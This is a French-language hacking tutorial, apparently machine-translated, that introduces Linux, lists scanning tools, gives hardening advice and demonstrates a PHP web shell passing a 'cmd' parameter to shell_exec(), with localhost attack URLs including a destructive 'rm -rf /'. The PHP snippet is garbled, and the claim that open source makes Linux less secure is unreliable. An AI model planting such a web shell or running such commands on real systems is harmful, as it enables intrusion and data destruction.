Linux est le système d'exploitation serveur le plus utilisé, en particulier pour les serveurs Web. C'est open source; cela signifie que n'importe qui peut avoir accès au code source. Cela le rend moins sécurisé par rapport aux autres systèmes d'exploitation, car les attaquants peuvent étudier le code source pour trouver des vulnérabilités . Linux for Hackers consiste à exploiter ces vulnérabilités pour obtenir un accès non autorisé à un système.
Dans cet article, nous vous présenterons ce qu'est Linux, ses vulnérabilités de sécurité, le piratage avec Ubuntu et les contre-mesures que vous pouvez mettre en place.
Sujets abordés dans ce didacticiel
- Note rapide sur Linux
- Outils de piratage Linux
- Comment empêcher les piratages Linux
- Activité de piratage: pirater un système Linux en utilisant PHP
Note rapide sur Linux
Linux est un système d'exploitation open source . Il existe de nombreuses distributions de systèmes d'exploitation basés sur Linux tels que Redhat, Fedora et Ubuntu, etc. Contrairement à d'autres systèmes d'exploitation, Linux est moins sécurisé en matière de sécurité. En effet, le code source est disponible gratuitement, il est donc facile de l'étudier pour les vulnérabilités et de les exploiter par rapport à d'autres systèmes d'exploitation qui ne sont pas open source. Linux peut être utilisé comme système d'exploitation de serveur, de bureau, de tablette ou de périphérique mobile.
Les programmes Linux peuvent être utilisés à l'aide de l'interface graphique ou des commandes. Les commandes Linux pour le piratage de Kali Linux sont plus efficaces et efficientes que l'utilisation de l'interface graphique. Pour cette raison, il est utile de connaître les commandes Linux de base pour le piratage.
Reportez-vous à ces tutoriels https://www.guru99.com/unix-linux-tutorial.html pour savoir comment démarrer avec les hacks Kali Linux.
Outils de piratage Linux
- Nessus - cet outil peut être utilisé pour le piratage d'Ubuntu, les paramètres de configuration de l'analyse, les correctifs et les réseaux, etc. il peut être trouvé à https://www.tenable.com/products/nessus
- NMap. Cet outil peut être utilisé pour surveiller les hôtes qui s'exécutent sur le serveur et les services qu'ils utilisent. Il peut également être utilisé pour rechercher des ports. Il peut être trouvé à https://nmap.org/
- SARA - SARA est l'acronyme de Security Auditor's Research Assistant. Comme son nom l'indique, cet outil peut être utilisé pour auditer les réseaux contre les menaces telles que l'injection SQL, XSS, etc., il peut être trouvé à http://www-arc.com/sara/sara.html
La liste ci-dessus n'est pas exhaustive; il vous donne une idée des outils disponibles pour le piratage et le piratage des systèmes Linux Ubuntu.
Comment empêcher les piratages Linux
Linux Hacking tire parti des vulnérabilités du système d'exploitation. Une organisation peut adopter la politique suivante pour se protéger contre de telles attaques.
- Gestion des correctifs - les correctifs corrigent les bogues que les attaquants exploitent pour compromettre un système. Une bonne politique de gestion des correctifs garantira que vous appliquerez constamment les correctifs pertinents à votre système.
- Configuration correcte du système d'exploitation - d'autres exploits tirent parti des faiblesses de la configuration du serveur. Les noms d'utilisateur et les démons inactifs doivent être désactivés. Les paramètres par défaut tels que les mots de passe communs à l'application, les noms d'utilisateur par défaut et certains numéros de port doivent être modifiés.
- Système de détection d'intrusion - ces outils peuvent être utilisés pour détecter un accès non autorisé au système. Certains outils ont la capacité de détecter et de prévenir de telles attaques.
Activité de piratage: pirater un système Linux Ubuntu à l'aide de PHP
Dans ce scénario pratique, nous allons apprendre à pirater avec Ubuntu et nous vous fournirons des informations de base sur la façon dont vous pouvez utiliser PHP pour compromettre un Linux. Nous n'allons viser aucune victime. Si vous souhaitez l'essayer, vous pouvez installer LAMPP sur votre machine locale.
PHP est livré avec deux fonctions qui peuvent être utilisées pour exécuter des commandes de piratage Linux. Il a des fonctions exec () et shell_exec (). La fonction exec () renvoie la dernière ligne de la sortie de la commande tandis que shell_exec () renvoie le résultat complet de la commande sous forme de chaîne.
À des fins de démonstration, supposons que les responsables des attaquants téléchargent le fichier suivant sur un serveur Web.
$cmd";$output = shell_exec($cmd);echo "$output";?>
ICI,
Le script ci-dessus obtient la commande de la variable GET nommée cmd. La commande est exécutée à l'aide de shell_exec () et les résultats sont renvoyés dans le navigateur.
Le code ci-dessus peut être exploité en utilisant l'URL suivante
http: //localhost/cp/konsole.php? cmd = ls% 20-l
ICI,
- «… Konsole.php? Cmd = ls% 20-l» affecte la valeur ls -l à la variable cmd .
La commande dans Ubuntu pour le piratage contre le serveur sera exécutée comme
shell_exec('ls -l') ;
L'exécution du code ci-dessus sur un serveur Web donne des résultats similaires aux suivants.
La commande ci-dessus affiche simplement les fichiers dans le répertoire actuel et les autorisations
Supposons que l'attaquant passe la commande suivante
rm -rf /
ICI,
- «Rm» supprime les fichiers
- «Rf» fait exécuter la commande rm en mode récursif. Suppression de tous les dossiers et fichiers
- «/» Indique à la commande de commencer à supprimer les fichiers du répertoire racine
L'URL d'attaque ressemblerait à ceci
http: //localhost/cp/konsole.php? cmd = rm% 20-rf% 20 /
Résumé
- Linux est un système d'exploitation populaire pour les serveurs, les ordinateurs de bureau, les tablettes et les appareils mobiles.
- Linux est open source et le code source peut être obtenu par n'importe qui. Cela facilite la détection des vulnérabilités. C'est l'un des meilleurs OS pour les pirates.
- Les commandes de piratage de base et de réseau dans Ubuntu sont précieuses pour les pirates informatiques Linux.
- Les vulnérabilités sont une faiblesse qui peut être exploitée pour compromettre un système.
- Une bonne sécurité peut aider à protéger un système contre la compromission d'un attaquant.